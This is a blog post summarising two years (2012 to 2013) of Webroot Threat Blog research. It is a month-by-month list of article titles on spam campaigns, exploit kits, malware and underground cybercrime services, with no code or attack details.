Historical OSINT - Summarizing 2 Years of Webroot's
Threat Blog Posts Research (2018-07-28 21:00)

It's been several years since I last posted a quality update at
the industry's leading threat-intelligence gathering
[1]Webroot's Threat Blog following a successful career as
lead security blogger and threat-intelligence analyst
throughout 2012-2014.

In this post I'll summarize two years' worth of Webroot's
Threat Blog research with the idea to provide readers
with the necessary data, information and knowledge to stay
ahead of current and emerging threats.

01. January - 2012 

• [2]Cybercriminals generate malicious Java applets using 
DIY tools 

• [3]A peek inside the uBot malware bot 


• [4]Researchers intercept a client-side exploits serving 
malware campaign 

• [5]How phishers launch phishing attacks 

• [6]A peek inside the Umbra malware loader 

• [7]How malware authors evade antivirus detection 

• [8]Inside AnonJDB - a Java based malware distribution
platforms for drive-by downloads 

• [9]Zappos.com hacked, 24 million users affected 

• [10]Inside a clickjacking/likejacking scam distribution
platform for Facebook 

• [11]A peek inside the Cythosia v2 DDoS Bot

• [12]A peek inside the PickPocket Botnet

• [13]Mass SQL injection attack affects over 200,000 URLs 

• [14]Email hacking for hire going mainstream 

• [15]Millions of harvested emails offered for sale

02. February - 2012

• [16]Research: Google's reCAPTCHA under fire

• [17]Spamvertised 'You have 1 lost message on Facebook' 
campaign leads to pharmaceutical scams 

• [18]A peek inside the Smoke Malware Loader




• [19]Researchers spot Citadel, a ZeuS crimeware variant 

• [20]Researchers intercept two client-side exploits serving 
malware campaigns 

• [21]Pharmaceutical scammers launch their own Web 
contest 

• [22]The United Nations hacked, Team Poison claims 
responsibility 

• [23]Report: Internet Explorer 9 leads in
socially-engineered malware protection

• [24]Twitter adds HTTPS support by default 

• [25]Spamvertised "Hallmark ecard" campaign leads to 
malware 

• [26]Report: 3,325% increase in malware targeting the
Android OS 

• [27]Why relying on antivirus signatures is simply not 
enough anymore 

• [28]Researchers intercept malvertising campaign using 
Yahoo's ad network 

• [29]A peek inside the Ann Malware Loader 

• [30]Spamvertised 'Termination of your CPA license'
campaign serving client-side exploits 

• [31]How cybercriminals monetize malware-infected hosts 

• [32]A peek inside the Elite Malware Loader 

• [33]BlackHole exploit kits gets updated with new features 



03. March - 2012 


• [34]New service converts malware-infected hosts into 
anonymization proxies 

• [35]Spamvertised 'Temporary Limit Access To Your
Account' emails lead to Citi phishing emails 

• [36]A peek inside the Darkness (Optima) DDoS Bot 

• [37]Research: proper screening could have prevented 67%
of abusive domain registrations

• [38]Spamvertised 'Your accountant license can be 
revoked' emails lead to client-side exploits and malware 

• [39]Spamvertised 'Google Pharmacy' themed emails lead 
to pharmaceutical scams 

• [40]Research: U.S accounts for 72% of fraudulent
pharmaceutical orders 

• [41]Millions of harvested U.S government and U.S military 
email addresses offered for sale 

• [42]Trojan Downloaders actively utilizing Dropbox for 
malware distribution

• [43]Spamvertised 'Your tax return appeal is declined'
emails serving client-side exploits and malware 

• [44]Malicious USPS-themed emails circulating in the wild 

• [45]Spamvertised LinkedIn notifications serving client-side
exploits and malware 



• [46]Tens of thousands of web sites affected in ongoing 
mass SQL injection attack 

• [47]Spamvertised Verizon-themed 'Your Bill Is Now 
Available' emails lead to ZeuS crimeware 

• [48]Spamvertised 'Scan from a Hewlett-Packard ScanJet' 
emails lead to client-side exploits and malware 

04. April - 2012 

• [49]Email hacking for hire going mainstream - part two 

• [50]Spamvertised 'US Airways' themed emails serving 
client-side exploits and malware 

• [51]New underground service offers access to hundreds of 
hacked PCs 

• [52]New DIY email harvester released in the wild 

05. May - 2012 

• [53]Managed SMS spamming services going mainstream 

• [54]A peek inside a boutique cybercrime-friendly E-shop 

• [55]Cybercriminals release 'Sweet Orange' - new web 
malware exploitation kit 

• [56]Spamvertised 'Pizzeria Order Details' themed 
campaign serving client-side exploits and malware 

• [57]Poison Ivy trojan spreading across Skype 

• [58]A peek inside a managed spam service 



• [59]Ongoing 'LinkedIn Invitation' themed campaign
serving client-side exploits and malware 


• [60]Spamvertised bogus online casino themed emails 
serving adware 

• [61]Spamvertised 'YouTube Video Approved' and 'Twitter
Support' themed emails lead to pharmaceutical scams

• [62]A peek inside a boutique cybercrime-friendly E-shop - 
part two 

• [63]Spamvertised CareerBuilder themed emails serving 
client-side exploits and malware 

• [64]Pop-ups at popular torrent trackers serving 
W32/Casonline adware 

• [65]'Windstream bill' themed emails serving client-side 
exploits and malware 

06. June - 2012 

• [66]Cybercriminals infiltrate the music industry by offering 
full newly released albums for just $1

• [67]A peek inside a boutique cybercrime-friendly E-shop -
part three 

• [68]DDoS for hire services offering to 'take down your 
competitor's web sites' going mainstream 

• [69]Skype propagating Trojan targets Syrian activists 



• [70]Spamvertised 'UPS Delivery Notification' emails 
serving client-side exploits and malware 

• [71]Spamvertised 'DHL Package delivery report' emails 
serving malware 

• [72]Spamvertised 'Your Amazon.com order confirmation'
emails serving client-side exploits and malware 

• [73]Cybercriminals populate Scribd with bogus adult 
content, spread malware using Comodo Backup 

• [74]Spamvertised 'Your Paypal Ebay.com payment' emails 
serving client-side exploits and malware 

• [75]'Create a Cartoon of You' ads serving MyWebSearch
toolbar 

• [76]Spamvertised 'Your UPS delivery tracking' emails 
serving client-side exploits and malware 

• [77]Spamvertised 'Confirm PayPal account' notifications
lead to phishing sites 

• [78]Spamvertised 'DHL Express Parcel Tracking 
Notification' emails serving malware 

• [79]Spamvertised bogus online casino themed emails 
serving W32/Casonline 

07. July - 2012 

• [80]Cybercriminals launch managed SMS flooding services 

• [81]117,000 unique U.S visitors offered for malware 
conversion 



• [82]Phishing campaign targeting Gmail, Yahoo, AOL and 
Hotmail spotted in the wild 

• [83]What's the underground market's going rate for a 
thousand U.S based malware infected hosts? 

• [84]Spamvertised American Airlines themed emails lead to 
Black Hole exploit kit 

• [85]Online dating scam campaign currently circulating in 
the wild 

• [86]New Russian service sells access to compromised 
social networking accounts 

• [87]Cybercriminals impersonate UPS in client-side exploits 
and malware serving spam campaign 

• [88]Russian Ask.fm spamming tool spotted in the wild 

• [89]Spamvertised Intuit themed emails lead to Black Hole 
exploit kit 

• [90]Cybercriminals impersonate Booking.com, serve
malware using bogus 'Hotel Reservation Confirmation'
themed emails

• [91]Spamvertised Craigslist themed emails lead to Black 
Hole exploit kit 

• [92]Cybercriminals impersonate law enforcement,
spamvertise malware-serving 'Speeding Ticket' themed
emails

• [93]Spamvertised 'Download your USPS Label' themed 
emails serve malware

• [94]Cybercriminals target Twitter, spread thousands of
exploits and malware serving tweets 

• [95]Russian spammers release Skype spamming tool 

• [96]Spamvertised 'Your Ebay funds are cleared' themed 
emails lead to Black Hole exploit kit 

08. August - 2012 

• [97]Spamvertised AICPA themed emails lead to Black Hole 
exploit kit 

• [98]Spamvertised 'PayPal has sent you a bank transfer' 
themed emails lead to Black Hole exploit kit 

• [99]Ongoing spam campaign impersonates LinkedIn,
serves exploits and malware 

• [100]Millions of spamvertised emails lead to
W32/Casonline 

• [101]Cybercriminals impersonate AT&T's Billing Service,
serve exploits and malware 

• [102]IRS themed spam campaign leads to Black Hole
exploit kit 

• [103]Cybercriminals spamvertise bogus greeting cards, 
serve exploits and malware 

• [104]Spamvertised 'Federal Tax Payment Rejected' 
themed emails lead to Black Hole exploit kit 

• [105]Spamvertised 'Fwd: Scan from a Hewlett-Packard 
ScanJet' emails lead to Black Hole exploit kit 



• [106]Spamvertised 'Royal Mail Shipping Advisory' themed 
emails serve malware 

• [107]Cybercriminals impersonate Intuit Market, mass mail 
millions of exploits and malware serving emails 

• [108]Cybercriminals spamvertise PayPal themed
'Notification of payment received' emails, serve malware 

• [109]Cybercriminals impersonate UPS, serve malware 

09. September - 2012 

• [110]Spamvertised 'Wire Transfer Confirmation' themed
emails lead to Black Hole exploit kit 

• [111]Intuit themed 'QuickBooks Update: Urgent' emails 
lead to Black Hole exploit kit 

• [112]Cybercriminals resume spamvertising bogus 
greeting cards, serve exploits and malware

• [113]Cybercriminals abuse Skype's SMS sending feature, 
release DIY SMS flooders 

• [114]New Russian service sells access to thousands of 
automatically registered accounts 

• [115]Spamvertised 'Your Fedex invoice is ready to be paid 
now' themed emails lead to Black Hole Exploit kit 

• [116]New Russian DIY SMS flooder using ICQ's SMS 
sending feature spotted in the wild 

• [117]Spamvertised 'US Airways reservation confirmation' 
themed emails serve exploits and malware 



• [118]Cybercriminals impersonate FDIC, serve client-side 
exploits and malware 


• [119]Managed Ransomware-as-a-Service spotted in the 
wild

• [120]A peek inside a boutique cybercrime-friendly E-shop
- part four 

• [121]New E-shop selling stolen credit cards data spotted in 
the wild 

• [122]From Russia with iPhone selling affiliate networks 

• [123]New Russian DIY DDoS bot spotted in the wild 

10. October - 2012 

• [124]New Russian DIY DDoS bot spotted in the wild 

• [125]Recently launched E-shop sells access to hundreds of 
hacked PayPal accounts 

• [126]New Russian service sells access to compromised 
Steam accounts 

• [127]'Vodafone Europe: Your Account Balance' themed 
emails serve malware 

• [128]Cybercriminals impersonate UPS, serve client-side 
exploits and malware 

• [129]'Your video may have illegal content' themed emails 
serve malware 



• [130]Cybercriminals spamvertise 'Amazon Shipping
Confirmation' themed emails, serve client-side exploits and
malware

• [131]American Airlines themed emails lead to the Black 
Hole Exploit Kit 

• [132]Bogus Facebook notifications lead to malware 

• [133]Spamvertised 'KLM E-ticket' themed emails serve 
malware 

• [134]'Intuit Payroll Confirmation inquiry' themed emails
lead to the Black Hole exploit kit 

• [135]Malware campaign spreading via Facebook direct 
messages spotted in the wild 

• [136]'Regarding your Friendster password' themed emails 
lead to Black Hole exploit kit 

• [137]Russian cybercriminals release new DIY DDoS 
malware loader 

• [138]PayPal 'Notification of payment received' themed 
emails serve malware 

• [139]Cybercriminals impersonate Delta Airlines, serve 
malware 

• [140]'Your UPS Invoice is Ready' themed emails serve 
malware 

• [141]Bogus Skype 'Password successfully changed' 
notifications lead to malware 



• [142]Cybercriminals impersonate Verizon Wireless, serve 
client-side exploits and malware 

• [143]Spamvertised 'BT Business Direct Order' themed 
emails lead to malware 

• [144]Cybercriminals spamvertise millions of British 
Airways themed e-ticket receipts, serve malware 

• [145]Cybercriminals spamvertise millions of bogus 
Facebook notifications, serve malware 

• [146]Nuclear Exploit Pack goes 2.0

11. November - 2012

• [147]BofA 'Online Banking Passcode Reset' themed emails 
serve client-side exploits and malware 

• [148]'ADP Immediate Notification' themed emails lead to 
Black Hole Exploit Kit 

• [149]USPS 'Postal Notification' themed emails lead to 
malware 

• [150]'Fwd: Scan from a Xerox W. Pro' themed emails lead 
to Black Hole Exploit Kit 

• [151]'Your Discover Card Services Blockaded' themed 
emails serve client-side exploits and malware 

• [152]'Payroll Account Holded by Intuit' themed emails lead 
to Black Hole Exploit Kit 

• [153]'American Express Alert: Your Transaction is Aborted'
themed emails serve client-side exploits and malware


• [154]Cybercriminals abuse major U.S SMS gateways, 
release DIY Mail-to-SMS flooders 

• [155]'PayPal Account Modified' themed emails lead to 
Black Hole Exploit Kit 

• [156]Bogus Better Business Bureau themed notifications 
serve client-side exploits and malware 

• [157]Cybercriminals spamvertise bogus eFax Corporate 
delivery messages, serve multiple malware variants 

• [158]Bogus IRS 'Your tax return appeal is declined' themed 
emails lead to malware 

• [159]'Copies of Missing EPLI Policies' themed emails lead 
to Black Hole Exploit Kit 

• [160]Cybercriminals spamvertise bogus 'Microsoft License 
Orders' serve client-side exploits and malware 

• [161]Cybercriminals resume spamvertising 'Payroll
Account Cancelled by Intuit' themed emails, serve
client-side exploits and malware

• [162]Cybercriminals spamvertise millions of FDIC 'Your
activity is discontinued' themed emails, serve client-side
exploits and malware

• [163]Cybercriminals release stealthy DIY mass iFrame 
injecting Apache 2 modules 

• [164]Multiple 'Intercompany' invoice themed campaigns
serve malware and client-side exploits 



• [165]Bogus Facebook 'pending notifications' themed 
emails serve client-side exploits and malware 

• [166]Cybercriminals target U.K users with bogus 'Pay by 
Phone Parking Receipts' serve malware 

• [167]Bogus DHL 'Express Delivery Notifications' serve 
malware 

• [168]Cybercriminals impersonate Vodafone U.K, spread 
malicious MMS notifications 

• [169]Cybercriminals impersonate T-Mobile U.K, serve 
malware 

• [170]Bogus 'Meeting Reminder' themed emails serve
malware 

• [171]Bogus 'Intuit Software Order Confirmations' lead to 
Black Hole Exploit Kit 

• [172]Bogus 'End of August Invoices' themed emails serve 
malware and client-side exploits

12. December - 2012

• [173]DIY malicious domain name registering service 
spotted in the wild 

• [174]Fake 'FedEx Tracking Number' themed emails lead to 
malware 

• [175]Bogus 'Facebook Account Cancellation Request'
themed emails serve client-side exploits and malware 



• [176]Malicious 'Security Update for Banking Accounts' 
emails lead to Black Hole Exploit Kit 

• [177]A peek inside a boutique cybercrime-friendly E-shop 
- part five 

• [178]Fake 'Flight Reservation Confirmations' themed 
emails lead to Black Hole Exploit Kit 

• [179]Malicious 'Sendspace File Delivery Notifications' lead 
to Black Hole Exploit Kit 

• [180]Fake Chase 'Merchant Billing Statement' themed 
emails lead to malware 

• [181]Cybercriminals entice potential cybercriminals into 
purchasing bogus credit cards data 

• [182]Fake 'Change Facebook Color Theme' events lead to 
rogue Chrome extensions 

• [183]Fake 'Citi Account Alert' themed emails lead to Black 
Hole Exploit Kit 

• [184]Spamvertised 'Work at Home' scams impersonating
CNBC spotted in the wild 

• [185]Pharmaceutical scammers spamvertise YouTube
themed emails, entice users into purchasing counterfeit
drugs

• [186]Cybercriminals resume spamvertising British Airways 
themed E-ticket receipts, serve malware 

• [187]Fake 'UPS Delivery Confirmation Failed' themed 
emails lead to Black Hole Exploit Kit 



12. January - 2013 

• [188]Spamvertised 'Your Recent eBill from Verizon
Wireless' themed emails serve client-side exploits and
malware

• [189]Fake BBB (Better Business Bureau) Notifications lead 
to Black Hole Exploit Kit 

• [190]'Attention! Changes in the bank reports!' themed 
emails lead to Black Hole Exploit Kit 

• [191]Fake 'You have made an Ebay purchase' themed 
emails lead to client-side exploits and malware 

• [192]A peek inside a boutique cybercrime-friendly E-shop
- part six 

• [193]Black Hole Exploit Kit author's 'vertical market 
integration' fuels growth in malicious Web activity 

• [194]Spamvertised AICPA themed emails serve client-side 
exploits and malware 

• [195]'Please confirm your U.S Airways online registration' 
themed emails lead to Black Hole Exploit Kit 

• [196]Malicious DIY Java applet distribution platforms going 
mainstream 

• [197]Fake 'ADP Speedy Notifications' lead to client-side 
exploits and malware

• [198]Cybercriminals release automatic CAPTCHA-solving
bogus Youtube account generating tool 



• [199]'Batch Payment File Declined' EFTPS themed emails 
lead to Black Hole Exploit Kit 

• [200]Cybercriminals resume spamvertising fake Vodafone
'A new picture or video message' themed emails,
serve malware

• [201]Leaked DIY malware generating tool spotted in the 
wild 

• [202]Email hacking for hire going mainstream - part three 

• [203]Android malware spreads through compromised 
legitimate Web sites 

• [204]Fake Intuit 'Direct Deposit Service Informer' themed 
emails lead to Black Hole Exploit Kit 

• [205]Fake LinkedIn 'Invitation Notifications' themed emails
lead to client-side exploits and malware 

• [206]Novice cybercriminals experiment with DIY 
ransomware tools 

• [207]Bogus 'Your Paypal Transaction Confirmation' themed 
emails lead to Black Hole Exploit Kit 

• [208]Fake 'FedEx Online Billing - Invoice Prepared to be 
Paid' themed emails lead to Black Hole Exploit Kit 

• [209]A peek inside a DIY password stealing malware 

• [210]Malicious 'Facebook Account Cancellation Request'
themed emails serve client-side exploits and malware 


12. February - 2013 



• [211]Fake Booking.com 'Credit Card was not Accepted' 
themed emails lead to malware 

• [212]Fake 'FedEx Tracking ID/Tracking Number/Tracking
Detail' themed emails lead to malware 

• [213]'Your Kindle e-book Amazon receipt' themed emails 
lead to Black Hole Exploit Kit 

• [214]New DIY HTTP-based botnet tool spotted in the wild 

• [215]Mobile spammers release DIY phone number 
harvesting tool 

• [216]New underground service offers access to thousands 
of malware-infected hosts 

• [217]Targeted 'phone ring flooding' attacks as a service 
going mainstream 

• [218]Fake 'You've blocked/disabled your Facebook
account' themed emails serve client-side exploits and
malware

• [219]Spamvertised IRS 'Income Tax Refund Turned Down' 
themed emails lead to Black Hole Exploit Kit 

• [220]Malware propagates through localized Facebook Wall 
posts 

• [221]Malicious 'RE: Your Wire Transfer' themed emails 
serve client-side exploits and malware 

• [222]New underground E-shop offers access to hundreds 
of hacked PayPal accounts 



• [223]Fake 'Verizon Wireless Statement' themed emails
lead to Black Hole Exploit Kit 

• [224]DIY malware cryptor as a Web service spotted in the 
wild

• [225]Malicious 'Data Processing Service' ACH File ID
themed emails serve client-side exploits and malware 

• [226]How mobile spammers verify the validity of 
harvested phone numbers 

• [227]How much does it cost to buy 10,000 U.S.-based 
malware-infected hosts? 

13. March - 2013 

• [228]New DIY IRC-based DDoS bot spotted in the wild 

• [229]Cybercriminals release new Java exploits centered 
exploit kit 

• [230]Segmented Russian "spam leads" offered for sale 

• [231]New DIY hacked email account content grabbing tool 
facilitates cyber espionage on a mass scale 

• [232]New DIY unsigned malicious Java applet generating 
tool spotted in the wild 

• [233]Commercial Steam 'information harvester/mass
group inviter' could lead to targeted fraudulent campaigns



• [234]Fake BofA CashPro 'Online Digital Certificate' themed
emails lead to malware 

• [235]Spamvertised BBB 'Your Accreditation Terminated'
themed emails lead to Black Hole Exploit Kit 

• [236]New ZeuS source code based rootkit available for 
purchase on the underground market 

• [237]Cybercriminals resume spamvertising 'Re: Fwd: Wire
Transfer' themed emails, serve client-side exploits
and malware

• [238]'ADP Package Delivery Notification' themed emails 
lead to Black Hole Exploit Kit 

• [239]Cybercrime-friendly community branded HTTP/SMTP 
based keylogger spotted in the wild 

• [240]Hacked PCs as 'anonymization stepping-stones' 
service operates in the open since 2004 

• [241]Fake 'CNN Breaking News Alerts' themed emails lead 
to Black Hole Exploit Kit 

• [242]Spotted: cybercriminals working on new Western 
Union based 'money mule management' script 

• [243]Malicious 'BBC Daily Email' Cyprus bailout themed 
emails lead to Black Hole Exploit Kit 

• [244]'ADP Payroll Invoice' themed emails lead to malware 

• [245]'Terminated Wire Transfer Notification/ACH File ID'
themed malicious campaigns lead to Black Hole Exploit Kit



• [246]New DIY RDP-based botnet generating tool leaks in 
the wild 

• [247]A peek inside the EgyPack Web malware exploitation 
kit 

14. April - 2013 

• [248]DIY Java-based RAT (Remote Access Tool) spotted in 
the wild 

• [249]Spamvertised 'Re: Changelog as promised' themed 
emails lead to malware

• [250]Cybercrime-friendly service offers access to tens of
thousands of compromised accounts 

• [251]Madi/Mahdi/Flashback OS X connected malware 
spreading through Skype 

• [252]Cybercriminals selling valid 'business card' data of 
company executives across multiple verticals 

• [253]A peek inside the 'Zerokit/0kit/ring0 bundle' bootkit

• [254]DIY Skype ring flooder offered for sale

• [255]Spamvertised 'Your order for helicopter for the 
weekend' themed emails lead to malware 

• [256]A peek inside a 'life cycle aware' underground
market ad for a private keylogger 

• [257]American Airlines 'You can download your ticket' 
themed emails lead to malware 



• [258]Cybercriminals offer spam-friendly SMTP servers for 
rent [259] 

• [260]How mobile spammers verify the validity of 
harvested phone numbers - part two 

• [261]A peek inside a (cracked) commercially available RAT 
(Remote Access Tool) 

• [262]DIY Russian mobile number harvesting tool spotted 
in the wild 

• [263]DIY SIP-based TDoS tool/number validity checker 
offered for sale 

• [264]CAPTCHA-solving Russian email account registration 
tool helps facilitate cybercrime 

• [265]Historical OSINT - The 'Boston Marathon explosion'
and 'Fertilizer plant explosion in Texas' themed
malware campaigns

• [266]Fake 'DHL Delivery Report' themed emails lead to 
malware 

• [267]Cybercriminals impersonate Bank of America (BofA), 
serve malware 

• [268]How fraudulent blackhat SEO monetizers apply 
Quality Assurance (QA) to their DIY doorway generators 

• [269]Managed 'Russian ransomware' as a service spotted 
in the wild 


15. May - 2013 



• [270]FedWire 'Your Wire Transfer' themed emails lead to 
malware 

• [271]A peek inside a CVE-2013-0422 exploiting DIY 
malicious Java applet generating tool 

• [272]New IRC/HTTP based DDoS bot wipes out competing 
malware 

• [273]New version of DIY Google Dorks based mass website 
hacking tool spotted in the wild 

• [274]Citibank 'Merchant Billing Statement' themed emails 
lead to malware 

• [275]Fake Amazon 'Your Kindle E-Book Order' themed
emails circulating in the wild, lead to client-side exploits
and malware

• [276]Cybercriminals impersonate New York State's 
Department of Motor Vehicles (DMV), serve malware 

• [277]Cybercriminals offer HTTP-based keylogger for sale, 
accept Bitcoin

• [278]Newly launched E-shop for hacked PCs charges
based on malware 'executions' 

• [279]New subscription-based 'stealth Bitcoin miner' 
spotted in the wild 

• [280]Fake 'Free Media Player' distributed via rogue 'Adobe 
Flash Player HD' advertisement 



• [281]New versatile and remote-controlled 
"Android.MouaBot" malware found in the wild 

• [282]Newly launched 'Magic Malware' spam campaign 
relies on bogus 'New MMS' messages 

• [283]Commercial 'form grabbing' rootkit spotted in the 
wild 

• [284]DIY malware cryptor as a Web service spotted in the 
wild - part two 

• [285]CVs and sensitive info soliciting email campaign 
impersonates NATO 

• [286]New commercially available DIY invisible Bitcoin 
miner spotted in the wild 

• [287]Fake 'Export License/Payment Invoice' themed emails 
lead to malware 

• [288]Compromised Indian government Web site leads to 
Black Hole Exploit Kit 

• [289]Cybercriminals resume spamvertising Citibank
'Merchant Billing Statement' themed emails, serve
malware

• [290]Marijuana-themed DDoS for hire service spotted in 
the wild 

• [291]Fake 'Vodafone U.K Images' themed malware serving 
spam campaign circulating in the wild 


16. June - 2013 



• [292]Compromised FTP/SSH account privilege-escalating
mass iFrame embedding platform released on the
underground marketplace

• [293]New E-shop sells access to thousands of hacked PCs, 
accepts Bitcoin 

• [294]Pharmaceutical scammers impersonate Facebook's
Notification System, entice users into purchasing
counterfeit drugs

• [295]iLivid ads lead to 'Searchqu Toolbar/Search Suite' 
PUA (Potentially Unwanted Application) 

• [296]Hacked Origin, Uplay, Hulu Plus, Netflix, Spotify,
Skype, Twitter, Instagram, Tumblr, Freelancer accounts
offered for sale

• [297]Scammers impersonate the UN Refugee Agency 
(UNHCR), seek your credit card details 

• [298]Fake 'Unsuccessful Fax Transmission' themed emails 
lead to malware 

• [299]Tens of thousands of spamvertised emails lead to 
W32/Casonline 

• [300]Rogue ads lead to SafeMonitorApp Potentially 
Unwanted Application (PUA) 

• [301]How cybercriminals apply Quality Assurance (QA) to 
their malware campaigns before launching them 

• [302]Rogue ads target EU users, expose them to 
Win32/Toolbar.SearchSuite through the KingTranslate PUA 



• [303]New boutique iFrame crypting service spotted in the 
wild

• [304]Rogue 'Oops Video Player' attempts to visually social
engineer users, mimics Adobe Flash Player's installation
process

• [305]New E-Shop sells access to thousands of
malware-infected hosts, accepts Bitcoin

• [306]New subscription-based SHA256/Scrypt supporting 
stealth DIY Bitcoin mining tool spotted in the wild 

• [307]Rogue 'Free Mozilla Firefox Download' ads lead to 
'InstallCore' Potentially Unwanted Application (PUA) 

• [308]SIP-based API-supporting fake caller ID/SMS number 
supporting DIY Russian service spotted in the wild 

• [309]Rogue 'Free Codec Pack' ads lead to 
Win32/InstallCore Potentially Unwanted Application (PUA)

• [310]Self-propagating ZeuS-based source code/binaries 
offered for sale 

• [311]How cybercriminals create and operate
Android-based botnets

17. July - 2013 

• [312]Cybercriminals experiment with Tor-based C&C, ring
3-rootkit empowered, SPDY form grabbing malware bot



• [313]Deceptive ads targeting German users lead to the
'W32/SomotoBetterInstaller' Potentially Unwanted
Application (PUA)

• [314]Newly launched underground market service 
harvests mobile phone numbers on demand 

• [315]Novel ransomware tactic locks users' PCs, demands 
that they participate in a survey to get the unlock code 

• [316]Spamvertised 'Export License/Invoice Copy' themed 
emails lead to malware 

• [317]Cybercriminals spamvertise tens of thousands of fake
'Your Booking Reservation at Westminster Hotel'
themed emails, serve malware

• [318]New commercially available mass FTP-based
proxy-supporting doorway/malicious script uploading
application spotted in the wild

• [319]Fake 'iG04 Private Car Insurance Policy Amendment 
Certificate' themed emails lead to malware 

• [320]Tens of thousands of spamvertised emails lead to the
Win32/PrimeCasino PUA (Potentially Unwanted
Application)

• [321]Spamvertised 'Vodafone U.K MMS ID/Fake Sage 50 
Payroll' themed emails lead to (identical) malware 

• [322]New commercially available Web-based 
WordPress/Joomla brute-forcing tool spotted in the wild 



• [323]Rogue ads targeting German users lead to 
Win32/InstallBrain PUA (Potentially Unwanted Application)

• [324]Yet another commercially available stealth 
Bitcoin/Litecoin mining tool spotted in the wild 

• [325]Protected: Deceptive 'Media Player Update' ads
expose users to the rogue 'Video Downloader/Bundlore'
Potentially Unwanted Application (PUA)

• [326]Newly launched 'HTTP-based botnet setup as a
service' empowers novice cybercriminals with bulletproof
hosting capabilities

• [327]Fake 'Copy of Vodafone U.K Contract/Your Monthly
Vodafone Bill is Ready/New MMS Received' themed
emails lead to malware

• [328]Rogue ads lead to the 'Free Player' Win32/Somoto 
Potentially Unwanted Application (PUA) 

• [329]How much does it cost to buy one thousand 
Russian/Eastern European based malware-infected hosts? 

• [330]Custom USB sticks bypassing Windows 7/8's AutoRun
protection measure going mainstream 

• [331]DIY commercially-available 'automatic Web site 
hacking as a service' spotted in the wild 


18. August - 2013 



• [332]'Malware-infected hosts as stepping stones' service
offers access to hundreds of compromised U.S based
hosts

• [333]New 'Hacked shells as a service' empowers 
cybercriminals with access to high page rank-ed Web sites 

• [334]Fake 'iPhone Picture Snapshot Message' themed 
emails lead to malware 

• [335]Malicious Bank of America (BofA) 'Statement of
Expenses' themed emails lead to client-side exploits and
malware

• [336]Cybercriminals spamvertise fake 'O2 U.K MMS'
themed emails, serve malware 

• [337]One-stop-shop for spammers offers DKIM-verified
SMTP servers, harvested email databases and training
to potential customers

• [338]Fake 'Apple Store Gift Card' themed emails serve 
client-side exploits and malware 

• [339]Newly launched managed 'malware dropping' service 
spotted in the wild 

• [340]Cybercrime-friendly underground traffic exchange 
helps facilitate fraudulent and malicious activity 

• [341]From Vietnam with tens of millions of harvested
emails, spam-ready SMTP servers and DIY spamming
tools



• [342]DIY Craigslist email collecting tools empower 
spammers with access to fresh/valid email addresses 

• [343]Bulletproof TDS/Doorways/Pharma/Spam/Warez 
hosting service operates in the open since 2009 

• [344]DIY automatic cybercrime-friendly 'redirectors 
generating' service spotted in the wild 

• [345]Cybercriminals offer spam-ready SMTP servers for 
rent/direct managed purchase 

• [346]Cybercrime-friendly underground traffic exchanges
help facilitate fraudulent and malicious activity - part
two

19. September - 2013 

• [347]DIY malicious Android APK generating 'sensitive 
information stealer' spotted in the wild 

• [348]Web-based DNS amplification DDoS attack mode 
supporting PHP script spotted in the wild 

• [349]Managed Malicious Java Applets Hosting Service 
Spotted in the Wild 

• [350]Affiliate network for mobile malware impersonates
Google Play, tricks users into installing premium-rate SMS
sending rogue apps

• [351]419 advance fee fraudsters abuse CNN's 'Email This'
Feature, spread Syrian Crisis themed scams

• [352]Cybercriminals offer anonymous mobile numbers for
'SMS activation', video tape the destruction of the
SIM card on request

• [353]Yet another 'malware-infected hosts as
anonymization stepping stones' service offering access to
hundreds of compromised hosts spotted in the wild

• [354]Cybercriminals experiment with
'Socks4/Socks5/HTTP' malware-infected hosts based DIY DoS
tool

• [355]Cybercriminals sell access to tens of thousands of 
malware-infected Russian hosts 

• [356]Spamvertised "FDIC: Your business account" themed 
emails serve client-side exploits and malware 

• [357]Cybercriminals experiment with Android compatible, 
Python-based SQL injecting releases 

• [358]Newly launched E-shop offers access to hundreds of 
thousands of compromised accounts 

• [359]DIY commercial CAPTCHA-solving automatic email
account registration tool available on the underground
market since 2008

• [360]Yet another subscription-based stealth Bitcoin mining 
tool spotted in the wild 


20. October - 2013 



• [361]A peek inside a Blackhat SEO/cybercrime-friendly 
doorways management platform 

• [362]Newly launched 'HTTP-based botnet setup as a
service' empowers novice cybercriminals with bulletproof
hosting capabilities - part two [363]

• [364]'T-Mobile MMS message has arrived' themed emails 
lead to malware 

• [365]DDoS for hire vendor 'vertically integrates' starts 
offering TDoS attack capabilities 

• [366]Commercially available Blackhat SEO enabled
multi-third-party product licenses empowered VPSs spotted
in the wild

• [367]New cybercrime-friendly iFrames-based E-shop for 
traffic spotted in the wild 

• [368]Cybercriminals offer spam-friendly SMTP servers for 
rent - part two 

• [369]Newly launched VDS-based cybercrime-friendly
hosting provider helps facilitate fraudulent/malicious
online activity

• [370]Fake 'You have missed emails' GMail themed emails 
lead to pharmaceutical scams 

• [371]Compromised Turkish Government Web site leads to 
malware 

• [372]Novice cybercriminals offer commercial access to five
mini botnets

• [373]Spamvertised T-Mobile 'Picture ID Type:MMS' themed
emails lead to malware

• [374]Yet another Bitcoin accepting E-shop offering access
to thousands of hacked PCs spotted in the wild

• [375]Malicious 'FW: File' themed emails lead to malware

• [376]Mass iframe injection campaign leads to Adobe Flash 
exploits 

• [377]Rogue ads lead to the 'Mipony Download
Accelerator/FunMoods Toolbar' PUA (Potentially Unwanted
Application)

• [378]A peek inside the administration panel of a 
standardized E-shop for compromised accounts 

• [379]U.K users targeted with fake 'Confirming your Sky 
offer' malware serving emails 

• [380]New DIY compromised hosts/proxies syndicating tool 
spotted in the wild 

• [381]Rogue ads lead to the 'EzDownloaderpro' PUA 
(Potentially Unwanted Application) 

• [382]Fake 'Scanned Image from a Xerox WorkCentre' 
themed emails lead to malware 

• [383]Fake 'Important: Company Reports' themed emails 
lead to malware 



• [384]Cybercriminals release new commercially available 
Android/BlackBerry supporting mobile malware bot 

• [385]Fake WhatsApp 'Voice Message Notification/1 New 
Voicemail' themed emails lead to malware 

21. November - 2013 

• [386]Google-dorks based mass Web site hacking/SQL 
injecting tool helps facilitate malicious online activity 

• [387]Deceptive ads lead to the SpyAlertApp PUA 
(Potentially Unwanted Application) 

• [388]Cybercriminals differentiate their 'access to
compromised PCs' service proposition, emphasize on the
prevalence of 'female bot slaves'

• [389]New vendor of 'professional DDoS for hire service'
spotted in the wild

• [390]Source code for proprietary spam bot offered for sale,
acts as force multiplier for cybercrime-friendly activity

• [391]Low Quality Assurance (QA) iframe campaign linked
to May's Indian government Web site compromise
spotted in the wild

• [392]Popular French torrent portal tricks users into
installing the BubbleDock/Downware/DownloadWare PUA
